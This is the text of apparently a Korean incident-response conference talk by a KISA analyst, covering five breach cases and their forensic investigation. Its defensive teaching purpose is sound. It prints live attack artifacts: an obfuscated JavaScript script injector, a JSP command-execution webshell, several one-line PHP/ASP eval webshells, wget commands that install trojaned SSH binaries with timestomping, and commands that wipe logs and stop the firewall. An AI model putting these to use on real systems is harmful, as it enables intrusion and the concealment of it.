SlideShare a Scribd company logo
1 of 80
Download to read offline
침해사고 대응
‘16.4.22
KISA 분석1팀 이재광
침해사고 분석 대응, EnCE/CISA/ISMS/CPPG
F-INSIGHT CONFERENCE 2016
이렇다고 전해라~
대응 체계
꺼리
Case 분석
• 초기 대응(시야 확보)
• 대응전략 수립(관찰의 힘)
• 상세 분석(예외 No, Profiling)
• 사후 조치(Collabo)
Think...
Episode
대응 체계
 피해시스템 분석을 위하여 다양한 분석 도구 및 장비 사용
- 디스크 이미지 복제 : Rapid Image, Magic Cube
- 전문 분석 도구 : Encase 7, FTK, F-EXPLORER
초기대응1st Case
시야가 확보되면 문제를 풀 수 있다
시야가 확보되면 문제를 풀 수 있다
서버 설정
DNS
설정 변경
스크립트
삽입
호스트
파일 변조
불법 리다이렉트
Keyword1st Case
불법 리다이렉트1st Case 시야확보
불법 리다이렉트1st Case 시야확보
180.131.1.79(koreaboxoffice.com / 브리즈피엔엠) -> rafomedia.com(158.85.62.205) ->
adrotate.se(83.140.162.230)
-> pops.ero-advertising.com(185.70.212.101) -> spaces.slimspots.com(176.31.224.189) ->
aff.camplace.com
불법 리다이렉트1st Case 시야확보
불법 리다이렉트1st Case 시야확보
불법 리다이렉트1st Case 시야확보
불법 리다이렉트1st Case 시야확보
180.x.x.79(korOOOice.com)
-> rafomedia.com(158.85.62.205)
-> adrotate.se(83.140.162.230)
-> pops.ero-advertising.com(185.70.212.101)
-> spaces.slimspots.com(176.31.224.189)
-> aff.camplace.com
불법 리다이렉트1st Case 시야확보
시야가 확보되면 문제를 풀 수 있다
삽질 하자는 뜻인 줄 알았다.
시야를 확보하자는 뜻이었다
Episode
2nd Case 대응전략 수립
관찰은 쓰다. 그러나 열매는 달다
웹셸 제거
계정 접근
제어 설정
서버 점검
서비스
재설치
서비스 망 해킹
2nd Case Keyword
117.x.x.188(한국, VPN)
211. x.x.19(한국, VPN)
211. x.x.3(한국, VPN)
211. x.x.203(한국)
210.x.x.22(한국)
116.x.x.1~116.x.x.255(중국)
웹서버(213)
hoxxy.OOO.com
웹서버(222)
www.OOO.com
파일서버(209)
file.OOO.com
파일서버(223)
hoxxdata.OOO.com
211.x47.x0.51(KR)
공유폴더 접속(관리자 계정)
웹셸 업로드
FTP 접속(관리자 계정)
웹셸 업로드
DB서버(210)
211.x34.x2.202(KR)
원격제어
OO닷컴 서버망
58.x.162.x
win 서버 13대
linux 서버 ??대
2nd Case 서비스 망 해킹 관찰의 힘
<213번 웹서> D:OnmamWebSiteSourcehomxx.OOO.com/common/js/prototype.js
<222번 웹서버> D:OnmamWebSiteSourceimages.OOO.comCommon_jsYUtil.js
myOOO.co.kr/test/f/ck.gif
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]
=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(ne
w RegExp('b'+e(c)+'b','g'),k[c])}}return p}('4.3("<0 2=1://5.b.6.a/9/8.7></0>");',12,12,'script|http|src|write|d
ocument|itoy|co|gif|all|images|kr|dbros'.split('|'),0,{}))
--> 디코딩 결과
document.write("<script src=http://itoy.dbOOO.co.kr/images/all.gif></script>");
2015-04-20 17:16:17 W3SVC678852465 58.x.x.213
POST /customer/con.asp(웹셸) - 80 – 117.x.x.188(한국, VPN)
Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.2;+Trident/4.0;+qdesk+2.4.1264.203;+.NET+CLR+1.1.4322;+.N
ET+CLR+2.0.50727;+.NET+CLR+3.0.04506.30;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) 200 0 0
2nd Case 서비스 망 해킹 관찰의 힘
일부 웹셸의 경우 IIS의 가상폴더를 이용하여 연결
2nd Case 서비스 망 해킹 관찰의 힘
웹셸이 삭제될 경우 공유폴더 접근을 통해 다시 업로드
2nd Case 서비스 망 해킹 관찰의 힘
공유폴더 접근 차단 조치 후 209번 서버에서 222번 서버로 FTP 접속, 다시 웹셸 업로드
2nd Case 서비스 망 해킹 관찰의 힘
209번 서버 확인결과, 외부 C&C로 백커넥트되어 있는 상태
2nd Case 서비스 망 해킹 관찰의 힘
사용자 행위 확인결과 공격도구인 Cain.exe 실행이력 확인
Cain.exe 실행 시점의 브라우저 기록을 확인한 결과 다수의 악성코드 추가다운 수행한 이력 확인
isangwhang.com/data/goodsimages/fxp.exe <시점 : 2015-04-28 18:40:58>
ischoolplus.com/css/zx.exe <시점 : 2015-04-28 23:07:31>
isangwhang.com/data/goodsimages/cain.exe <시점 : 2015-04-28 23:15:37>
209번 파일서버 브라우져 로그 확인 - 공격자가 추가 악성코드 다운을 시도
2nd Case 서비스 망 해킹 관찰의 힘
악성코드를 추가 다운한 시점의 이벤트로그 확인 - 223번 서버에서 209번 서버로 원격터미널 접속
223번 파일서버 : 209과 동일한 원격제어 악성코드가 설치, 외부 C&C로 백커넥트 연결
※ 악성코드 명 : lss.jpg(해킹도구인 HTran 악성코드)
※ C&C : 211.x.x.202:443(한국)
2nd Case 서비스 망 해킹 관찰의 힘
C2로 악용된 서버 추가 분석 - 211.x47.x0.51(OO닷컴 DB서버)
2nd Case 서비스 망 해킹 관찰의 힘
2nd Case 서비스 망 해킹 관찰의 힘
2nd Case 서비스 망 해킹 관찰의 힘
관찰은 쓰다. 그러나 열매는 달다
감동보다 큰 설득은 없다
Episode
3rd Case 상세 분석
충분히 대화하라, 예외를 두지 말라
관리자 PC
보안관리
개발 어플리케이션
보안
정기 점검
접근제어
개발 망 해킹
로그관리
3rd Case Keyword
3rd Case 개발 망 해킹 예외는 없다
3rd Case
메모리상에서 동작중인 DDoS 악성코드
예외는 없다개발 망 해킹
3rd Case
2013-07-10 10:23:10,134 INFO [org.jboss.naming.NamingService] Started jndi bootstrap jnpPort=1099,
rmiPort=1098, backlog=50, bindAddress=/0.0.0.0,
2013-07-10 10:23:14,293 INFO [org.jboss.mq.il.uil2.UILServerILService] JBossMQ UIL
service available at : /0.0.0.0:8093
......(중략)
2015-07-30 15:48:09,072 INFO [org.jboss.naming.NamingService] Started jndi bootstrap jnpPort=1099,
rmiPort=1098, backlog=50, bindAddress=/0.0.0.0,
2015-07-30 15:48:12,589 INFO [org.jboss.mq.il.uil2.UILServerILService] JBossMQ UIL
service available at : /0.0.0.0:8093
예외는 없다개발 망 해킹
3rd Case
2013-09-21 06:50:54,798 INFO [org.jboss.web.tomcat.tc5.TomcatDeployer] deploy, //업로드
ctxPath=/webconsole, //파일명
warUrl=file:/usr/local/jboss/server/default/deploy/management/webconsole.war/ //경로
예외는 없다개발 망 해킹
3rd Case
<%@page import="java.io.*"%><HTML><BODY><FORM METHOD="GET"
NAME="myform" ACTION=""><INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit"
VALUE="Execute"></FORM><PRE><%if (request.getParameter("cmd") != null)
{out.println("Command:" + request.getParameter("cmd"));
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();InputStream in = p.getInputStream();DataInputStream dis = new
DataInputStream(in);String disr = dis.readLine();
while ( disr != null ) { out.println(disr);disr = dis.readLine();}}%></BODY></HTML></pre>
개발 망 해킹 예외는 없다
3rd Case
해당 Jboss 기능과 웹셸을 이용하여 악성 파일 생성 및 실행
웹셸 5개, 다운로더 58개, 백도어 1종, IRC bot 1종, DDoS 공격 악성코드 1종 생성
DDoS 악성코드 실행 시 생성되는 설정 파일 시간 값
예외는 없다개발 망 해킹
3rd Case
백도어
예외는 없다개발 망 해킹
3rd Case
/tmp/.1/ 경로에 설치된 [energy mech 2.8] IRC bot
http://www.energymech.net/index.html
예외는 없다개발 망 해킹
3rd Case 예외는 없다개발 망 해킹
관찰은 쓰다. 그러나 열매는 달다
우리의 대화는 목적이 서로 다르다
Episode
4th Case Profiling
소통하여 인텔리를 활용하라
거점 확보
기법
내부 확산
기법
C2 운영
기법
웹셸 운영
기법
공격 기법
코드 유포
기법
타깃 식별
기법
4th Case Keyword
cd /tmp/xxx/temp/; wget http://www.OOO.com/xxx/aa.gif
wget http://www.OOO.com/xxx/bb.gif
wget http://www.OOO.com/xxx/cc.gif
mv aa.gif sshd; mv bb.gif ssh; mv cc.gif scp; chmod 755 sshd ssh scp;ls –al
cd /usr/sbin/; mv sshd sshd.bak; cd /usr/bin/; mv scp scp.bak; mv ssh ssh.bak
cd /tmp/xxx/temp/; cp sshd /usr/sbin/sshd; cp ssh /usr/bin/ssh; cp scp /usr/bin/scp
/etc/init.d/sshd restart
ssh 127.0.0.1
cd /usr/bin/; touch –r scp.bak scp ssh; rm –f *.bak; ls –al scp ssh
cd /usr/sbin/; touch –r sshd.bak sshd; rm –f sshd.bak; ls –al sshd
4th Case 거점 확보 기법 Profiling
SSH 백도어
[root@ksxxxx backup_virus]# strings /usr/sbin/sshd | more
Bad options in %.100s file, line %lu: %.50s
KiTrap0DExp!!! --> 공격자가 원격으로 로그인하기 위해 사용하는 비밀번호
/usr/share/ssh//slog --> 관리자의 계정을 로깅하는 키로깅 파일
%s:%s --> 키로깅 형태
trying public RSA key file %s
auth-rsa.c
[root@ksxxxx- ssh]# cat slog | tail
www:prin****
www:prince4025
root:rlawl****
root:wwlas****
root:eel!****
root:lliet****
4th Case 거점 확보 기법 Profiling
SSH 백도어
4th Case 거점 확보 기법 Profiling
SSH 백도어
usb-spi.ko 파일은 TCP 통신 트래픽 중 ‘fuck@root’ 문자열이 포
함된 패킷을 수신하면 /var/lib/nfs/statd/dm/libijs.so 실행
루트킷 파일
/lib/modules/2.6.18-404.el5/kernel/sound/usb/usb-spi.ko
/var/lib/nfs/statd/dm/libijs.so
/var/lib/nfs/statd/dm/libijs2.so
libijs.so 파일은 공격자가 설정한 IP주소로 리버스 텔넷 시도
4th Case 거점 확보 기법 Profiling
루트킷
/proc 폴더 분석을 통한 숨겨진 프로세스 탐지 기법
cmdline : 명령행 매개변수
cwd : 현재 작업 디렉토리
maps : 실행 파일과 라이브러리에 대한 메모리
맵
mem : 프로세스 메모리
status : 프로세스 상태
environ : 프로세스에 공개된 환경변수
exe : 프로세스의 실행파일
fd : 프로세스가 열어놓은 파일 목록
root : 프로세스 루트 디렉토리
4th Case 거점 확보 기법 Profiling
루트킷
/proc 폴더 분석을 통한 숨겨진 프로세스 탐지 기법
for PID in $(./chkproc -v | grep "PID" | grep "/" | awk -F "(" '{print $1}' | awk '{print $2}');
do echo -n "PID[$PID]"; ls -al /proc/$PID |grep exe |awk '{print "exe -> "$11}'; done
4th Case 거점 확보 기법 Profiling
루트킷
/proc 폴더 분석을 통한 숨겨진 프로세스 탐지 기법
for PID in $(find ./ -name exe | grep -v task | awk -F "/" '{print $2}'); do echo -n "PID[$PID]";
ls -al /proc/$PID | grep exe |awk '{print "exe -> "$11}';done
4th Case 거점 확보 기법 Profiling
루트킷
/usr/bin/umount –l root –p 22 –z dkagh#@!220.x.x.25
“cd /root/; mv .bash_history .bash_history.bak; ls-al”
/usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.25
“cd /var/log/; mv wtmp wtmp.bak; mv lastlog lastlog.bak; mv secure secure.bak; ls –al *.bak”
/usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.25
“/etc/init.d/iptables stop”
/usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.28
…
/usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.29
…
/usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.35
…
/usr/bin/umount –l root –p 22 –z dkagh#@! 220.x.x.36
4th Case 내부 확산 기법 Profiling
국내 소프트웨어 업체 인증서로 서명된 악성코드
4th Case 타깃 식별 기법 Profiling
4th Case 타깃 식별 기법 Profiling
http://www.boutell.com/rinetd/
4th Case C2 운영 기법 Profiling
4th Case C2 운영 기법 Profiling
4th Case C2 운영 기법 Profiling
4th Case C2 운영 기법 Profiling
4th Case C2 운영 기법 Profiling
C&C에서 추출된 DB -1
4th Case C2 운영 기법 Profiling
4th Case 코드 유포 기법 Profiling
<%eval request("*0#")%>
<?php eval($_POST[ad]);?>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"""mFpECU"""&")"&")")%>
<?php preg_replace("//e",str_replace('%','v'.'a','e'.'%'.'l($_R'.'E'.'Q'.'U'.'E'.'S'.'T'.'[s'.'m'.'s'.'])'),"");?>
<?php eval($_POST[cmd]);?><?ob_start();?><?ob_start();?> <?ob_start();?>
4th Case 웹셸 운영 기법 Profiling
4th Case 웹셸 운영 기법 Profiling
웹 소스 경로에서 웹셸 검사 ??
웹 로그 기반 침해사고 대응 ??
4th Case 웹셸 운영 기법 Profiling
4th Case 웹셸 운영 기법 Profiling
윈도우 API로 접근
4th Case 웹셸 운영 기법 Profiling
웹으로 접근
4th Case 웹셸 운영 기법 Profiling
4th Case 웹셸 운영 기법 Profiling
관찰은 쓰다. 그러나 열매는 달다
가치있는 정보의 차이가 진짜 차이다
Episode
5th Case 사후 조치
Cooperation ⇒ Collaboration
관리자
관심 Web
내부망
전파 커뮤니티
DB 유출
관리자 보호
거점, 로그
취약한
호스팅
스피어
피싱
5th Case Keyword
로그
거점
5th Case
Scrum vs Kanban.hwp
61.x.x.251 port : 443 (C&C, )
122.x.x.214 port : 443 (C&C)
15년도 추계학술대회 안내문.hwp
203.x.x.163 port : 443,8443 (C&C)
196.x.x.106 port : 443, 8443 (C&C)
관리자 공격 Collabo
5th Case 관리자 공격 Collabo
5th Case 관리자 공격 Collabo
5th Case
① 해킹된 웹사이트 조치 과정에서 악성코드 감염
② 원격제어권 확보
③ 관리자 PC의 관리프로그램을 통한 RAT 설치
④ 다수 웹서버에 대한 추가 원격제어권 확보
관리자 공격
취약한 웹에서 사용되는 ActiveX 취약점을 공격에 악용
대기… 대기... 대기…
Collabo
5th Case 관리자 공격
[root@exxx bin]# stat /lib/libcom.so.3.0.1
File: `/lib/libcom.so.3.0.1'
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
리눅스 preload (/etc/ld.so.preload) - 모든 프로세스에 so 파일 인젝션
Collabo
5th Case 관리자 공격
디도스 공격 C2
’15.4.25
27.x55.78.x
금융정보유출
’15.7.7
APT C2
사용자
zhongwei wang
26815139@qq.com
27.x55.84.x
’15.1.22
27.x55.67.x
디도스 & 원격제어 C2
’14.12.10
27.x55.71.x
5th Case 주요 거점 Collabo
76
8
16
0 10 20 30 40 50 60 70 80
1개월~3개월
4개월~6개월
6개월~1년
최초 침투에서 악성코드 유포까지 소요된 기간 비율
시스템 상세 분석이
진행된 사고(50여건) 기준
5th Case Log... Collabo
관찰은 쓰다. 그러나 열매는 달다
내가 해봐야 하는 것은 보안 내재화다
Episode
 명확하고 신속한 의사소통(분석가, 피해기관, 유관기관)
 다양한 로그 분석을 통한 신중한 결과 도출(유관기관과의 정보공유)
 분석 결과 기반 추가 증거 수집
 이미지 및 방화벽로그/DB로그/해킹도구 등 다양한 분석 경험
 전체적인 분석방향 및 일정 조율
 상세한 리포트
거의 끝. Think... NOPASIM
 공격대상 기관의 특성에 따라 침투 경로 및 기법 상이
 보안 체계 자체의 Risk
 최초 침투경로 확인 방안 / 전사적 보안 점검 방안
 로그관리의 표준화
 네트워크 기반 이상행위 탐지 체계
 Defensive Security의 활성
거의 끝. Think... NOPASIM
(Ficon2016) #2 침해사고 대응, 이렇다고 전해라

More Related Content

What's hot

SAFE: A better replacement for convertible notes - Brendan Ciecko - Innovatio...
SAFE: A better replacement for convertible notes - Brendan Ciecko - Innovatio...SAFE: A better replacement for convertible notes - Brendan Ciecko - Innovatio...
SAFE: A better replacement for convertible notes - Brendan Ciecko - Innovatio...Innovation Nest VC
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyKaspersky
 
[Gridgain]인메모리컴퓨팅 및 국내레퍼런스 소개
[Gridgain]인메모리컴퓨팅 및 국내레퍼런스 소개 [Gridgain]인메모리컴퓨팅 및 국내레퍼런스 소개
[Gridgain]인메모리컴퓨팅 및 국내레퍼런스 소개 CJ Olivenetworks
 
Team Conflicted Capital Team - 2021 Technology, Innovation & Great Power Comp...
Team Conflicted Capital Team - 2021 Technology, Innovation & Great Power Comp...Team Conflicted Capital Team - 2021 Technology, Innovation & Great Power Comp...
Team Conflicted Capital Team - 2021 Technology, Innovation & Great Power Comp...Stanford University
 
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 clean
WAF ASM / Advance WAF - Brute force   lior rotkovitch  f5 sirt v5 cleanWAF ASM / Advance WAF - Brute force   lior rotkovitch  f5 sirt v5 clean
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 cleanLior Rotkovitch
 
Program for Creating a New Military-Industrial Complex of Ukraine
Program for Creating a New Military-Industrial Complex of UkraineProgram for Creating a New Military-Industrial Complex of Ukraine
Program for Creating a New Military-Industrial Complex of UkraineNGOTechInstitutions
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
SIP Attack Handling (Kamailio World 2021)
SIP Attack Handling (Kamailio World 2021)SIP Attack Handling (Kamailio World 2021)
SIP Attack Handling (Kamailio World 2021)Fred Posner
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
HTTP/2で 速くなるとき ならないとき
HTTP/2で 速くなるとき ならないときHTTP/2で 速くなるとき ならないとき
HTTP/2で 速くなるとき ならないときKazuho Oku
 
The Secret Gold Treaty by David Guyatt
The Secret Gold Treaty by David GuyattThe Secret Gold Treaty by David Guyatt
The Secret Gold Treaty by David GuyattSergey Oboroc
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior
 

What's hot (20)

SAFE: A better replacement for convertible notes - Brendan Ciecko - Innovatio...
SAFE: A better replacement for convertible notes - Brendan Ciecko - Innovatio...SAFE: A better replacement for convertible notes - Brendan Ciecko - Innovatio...
SAFE: A better replacement for convertible notes - Brendan Ciecko - Innovatio...
 
EXIGENCIES AND AMERICA'S CAMPAIGN TO CREATE A MASTER RACE
 EXIGENCIES AND AMERICA'S CAMPAIGN TO CREATE A MASTER RACE EXIGENCIES AND AMERICA'S CAMPAIGN TO CREATE A MASTER RACE
EXIGENCIES AND AMERICA'S CAMPAIGN TO CREATE A MASTER RACE
 
Upping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from KasperskyUpping the APT hunting game: learn the best YARA practices from Kaspersky
Upping the APT hunting game: learn the best YARA practices from Kaspersky
 
[Gridgain]인메모리컴퓨팅 및 국내레퍼런스 소개
[Gridgain]인메모리컴퓨팅 및 국내레퍼런스 소개 [Gridgain]인메모리컴퓨팅 및 국내레퍼런스 소개
[Gridgain]인메모리컴퓨팅 및 국내레퍼런스 소개
 
Team Conflicted Capital Team - 2021 Technology, Innovation & Great Power Comp...
Team Conflicted Capital Team - 2021 Technology, Innovation & Great Power Comp...Team Conflicted Capital Team - 2021 Technology, Innovation & Great Power Comp...
Team Conflicted Capital Team - 2021 Technology, Innovation & Great Power Comp...
 
overview-peerconnection-lifetime
overview-peerconnection-lifetimeoverview-peerconnection-lifetime
overview-peerconnection-lifetime
 
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 clean
WAF ASM / Advance WAF - Brute force   lior rotkovitch  f5 sirt v5 cleanWAF ASM / Advance WAF - Brute force   lior rotkovitch  f5 sirt v5 clean
WAF ASM / Advance WAF - Brute force lior rotkovitch f5 sirt v5 clean
 
Program for Creating a New Military-Industrial Complex of Ukraine
Program for Creating a New Military-Industrial Complex of UkraineProgram for Creating a New Military-Industrial Complex of Ukraine
Program for Creating a New Military-Industrial Complex of Ukraine
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
THE BLACK EAGLE GOLD
THE BLACK EAGLE GOLD THE BLACK EAGLE GOLD
THE BLACK EAGLE GOLD
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
SIP Attack Handling (Kamailio World 2021)
SIP Attack Handling (Kamailio World 2021)SIP Attack Handling (Kamailio World 2021)
SIP Attack Handling (Kamailio World 2021)
 
The Matrix U.S. Constitution
The Matrix  U.S. ConstitutionThe Matrix  U.S. Constitution
The Matrix U.S. Constitution
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
 
HTTP/2で 速くなるとき ならないとき
HTTP/2で 速くなるとき ならないときHTTP/2で 速くなるとき ならないとき
HTTP/2で 速くなるとき ならないとき
 
The Secret Gold Treaty by David Guyatt
The Secret Gold Treaty by David GuyattThe Secret Gold Treaty by David Guyatt
The Secret Gold Treaty by David Guyatt
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security Policy
 
Secure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injectionSecure Code Warrior - CRLF injection
Secure Code Warrior - CRLF injection
 
Blind XSS & Click Jacking
Blind XSS & Click JackingBlind XSS & Click Jacking
Blind XSS & Click Jacking
 

Viewers also liked

(Fios#03) 4. 파워셸 포렌식 조사 기법
(Fios#03) 4. 파워셸 포렌식 조사 기법(Fios#03) 4. 파워셸 포렌식 조사 기법
(Fios#03) 4. 파워셸 포렌식 조사 기법INSIGHT FORENSIC
 
(160820) #fitalk fileless malware forensics
(160820) #fitalk    fileless malware forensics(160820) #fitalk    fileless malware forensics
(160820) #fitalk fileless malware forensicsINSIGHT FORENSIC
 
초보자를 위한 시스템 해킹 공부 가이드라인
초보자를 위한 시스템 해킹 공부 가이드라인초보자를 위한 시스템 해킹 공부 가이드라인
초보자를 위한 시스템 해킹 공부 가이드라인H4C
 
(150124) #fitalk advanced $usn jrnl forensics (korean)
(150124) #fitalk   advanced $usn jrnl forensics (korean)(150124) #fitalk   advanced $usn jrnl forensics (korean)
(150124) #fitalk advanced $usn jrnl forensics (korean)INSIGHT FORENSIC
 
(Fios#02) 7. 윈도우 10 포렌식 분석
(Fios#02) 7. 윈도우 10 포렌식 분석(Fios#02) 7. 윈도우 10 포렌식 분석
(Fios#02) 7. 윈도우 10 포렌식 분석INSIGHT FORENSIC
 
(Ficon2016) #1 디지털포렌식, 어디까지 왔나
(Ficon2016) #1 디지털포렌식, 어디까지 왔나(Ficon2016) #1 디지털포렌식, 어디까지 왔나
(Ficon2016) #1 디지털포렌식, 어디까지 왔나INSIGHT FORENSIC
 
(Ficon2016) #4 실 사례를 통해 본 네트워크 포렌식의 범위와 효용
(Ficon2016) #4 실 사례를 통해 본 네트워크 포렌식의 범위와 효용(Ficon2016) #4 실 사례를 통해 본 네트워크 포렌식의 범위와 효용
(Ficon2016) #4 실 사례를 통해 본 네트워크 포렌식의 범위와 효용INSIGHT FORENSIC
 

Viewers also liked (7)

(Fios#03) 4. 파워셸 포렌식 조사 기법
(Fios#03) 4. 파워셸 포렌식 조사 기법(Fios#03) 4. 파워셸 포렌식 조사 기법
(Fios#03) 4. 파워셸 포렌식 조사 기법
 
(160820) #fitalk fileless malware forensics
(160820) #fitalk    fileless malware forensics(160820) #fitalk    fileless malware forensics
(160820) #fitalk fileless malware forensics
 
초보자를 위한 시스템 해킹 공부 가이드라인
초보자를 위한 시스템 해킹 공부 가이드라인초보자를 위한 시스템 해킹 공부 가이드라인
초보자를 위한 시스템 해킹 공부 가이드라인
 
(150124) #fitalk advanced $usn jrnl forensics (korean)
(150124) #fitalk   advanced $usn jrnl forensics (korean)(150124) #fitalk   advanced $usn jrnl forensics (korean)
(150124) #fitalk advanced $usn jrnl forensics (korean)
 
(Fios#02) 7. 윈도우 10 포렌식 분석
(Fios#02) 7. 윈도우 10 포렌식 분석(Fios#02) 7. 윈도우 10 포렌식 분석
(Fios#02) 7. 윈도우 10 포렌식 분석
 
(Ficon2016) #1 디지털포렌식, 어디까지 왔나
(Ficon2016) #1 디지털포렌식, 어디까지 왔나(Ficon2016) #1 디지털포렌식, 어디까지 왔나
(Ficon2016) #1 디지털포렌식, 어디까지 왔나
 
(Ficon2016) #4 실 사례를 통해 본 네트워크 포렌식의 범위와 효용
(Ficon2016) #4 실 사례를 통해 본 네트워크 포렌식의 범위와 효용(Ficon2016) #4 실 사례를 통해 본 네트워크 포렌식의 범위와 효용
(Ficon2016) #4 실 사례를 통해 본 네트워크 포렌식의 범위와 효용
 

Similar to (Ficon2016) #2 침해사고 대응, 이렇다고 전해라

(130511) #fitalk utilization of ioc, ioaf and sig base
(130511) #fitalk   utilization of ioc, ioaf and sig base(130511) #fitalk   utilization of ioc, ioaf and sig base
(130511) #fitalk utilization of ioc, ioaf and sig baseINSIGHT FORENSIC
 
(130216) #fitalk reverse connection tool analysis
(130216) #fitalk   reverse connection tool analysis(130216) #fitalk   reverse connection tool analysis
(130216) #fitalk reverse connection tool analysisINSIGHT FORENSIC
 
악성코드와 분석 방안
악성코드와 분석 방안악성코드와 분석 방안
악성코드와 분석 방안Youngjun Chang
 
악성코드와 분석 방안
악성코드와 분석 방안악성코드와 분석 방안
악성코드와 분석 방안Youngjun Chang
 
(130608) #fitalk trends in d forensics (may, 2013)
(130608) #fitalk   trends in d forensics (may, 2013)(130608) #fitalk   trends in d forensics (may, 2013)
(130608) #fitalk trends in d forensics (may, 2013)INSIGHT FORENSIC
 
(140407) #fitalk d trace를 이용한 악성코드 동적 분석
(140407) #fitalk   d trace를 이용한 악성코드 동적 분석(140407) #fitalk   d trace를 이용한 악성코드 동적 분석
(140407) #fitalk d trace를 이용한 악성코드 동적 분석INSIGHT FORENSIC
 
지능형지속위협공격 최신동향 분석
지능형지속위협공격 최신동향 분석지능형지속위협공격 최신동향 분석
지능형지속위협공격 최신동향 분석한익 주
 
2.악성코드와 분석 방안
2.악성코드와 분석 방안2.악성코드와 분석 방안
2.악성코드와 분석 방안Youngjun Chang
 
20171212 [ai times] 'ai' 인공지능-ai security 개발을 위한 시도 - 1 (nlp 모델 테스트 2.2.11)...
20171212 [ai times] 'ai'   인공지능-ai security 개발을 위한 시도 - 1 (nlp 모델 테스트 2.2.11)...20171212 [ai times] 'ai'   인공지능-ai security 개발을 위한 시도 - 1 (nlp 모델 테스트 2.2.11)...
20171212 [ai times] 'ai' 인공지능-ai security 개발을 위한 시도 - 1 (nlp 모델 테스트 2.2.11)...jason min
 
보안 위협 형태와 악성코드 분석 기법
보안 위협 형태와 악성코드 분석 기법보안 위협 형태와 악성코드 분석 기법
보안 위협 형태와 악성코드 분석 기법Youngjun Chang
 
보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법Youngjun Chang
 
보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법보안 위협과 악성코드 분석 기법
보안 위협과 악성코드 분석 기법Youngjun Chang
 
(Fios#02) 1. 랜섬웨어 연대기
(Fios#02) 1. 랜섬웨어 연대기(Fios#02) 1. 랜섬웨어 연대기
(Fios#02) 1. 랜섬웨어 연대기INSIGHT FORENSIC
 
안드로이드 악성코드의 철학적_연구_padocon_조효제
안드로이드 악성코드의 철학적_연구_padocon_조효제안드로이드 악성코드의 철학적_연구_padocon_조효제
안드로이드 악성코드의 철학적_연구_padocon_조효제Hyoje Jo
 
악성코드 분석 도구
악성코드 분석 도구악성코드 분석 도구
악성코드 분석 도구Youngjun Chang
 
[무료] 시스템해킹(해커스쿨문제풀이) 공개버전
[무료] 시스템해킹(해커스쿨문제풀이) 공개버전[무료] 시스템해킹(해커스쿨문제풀이) 공개버전
[무료] 시스템해킹(해커스쿨문제풀이) 공개버전James (SeokHun) Hwang
 
악성코드 자동화 분석을 통한 인텔리전스(쿡쿠 샌드박스)
악성코드 자동화 분석을 통한 인텔리전스(쿡쿠 샌드박스)악성코드 자동화 분석을 통한 인텔리전스(쿡쿠 샌드박스)
악성코드 자동화 분석을 통한 인텔리전스(쿡쿠 샌드박스)FNGS Labs
 
16.02.27 해킹캠프 오픈 소스 최우석
16.02.27 해킹캠프 오픈 소스 최우석16.02.27 해킹캠프 오픈 소스 최우석
16.02.27 해킹캠프 오픈 소스 최우석KISEC
 
16.02.27 해킹캠프 오픈_소스_최우석_ver0.3
16.02.27 해킹캠프 오픈_소스_최우석_ver0.316.02.27 해킹캠프 오픈_소스_최우석_ver0.3
16.02.27 해킹캠프 오픈_소스_최우석_ver0.3KISEC
 
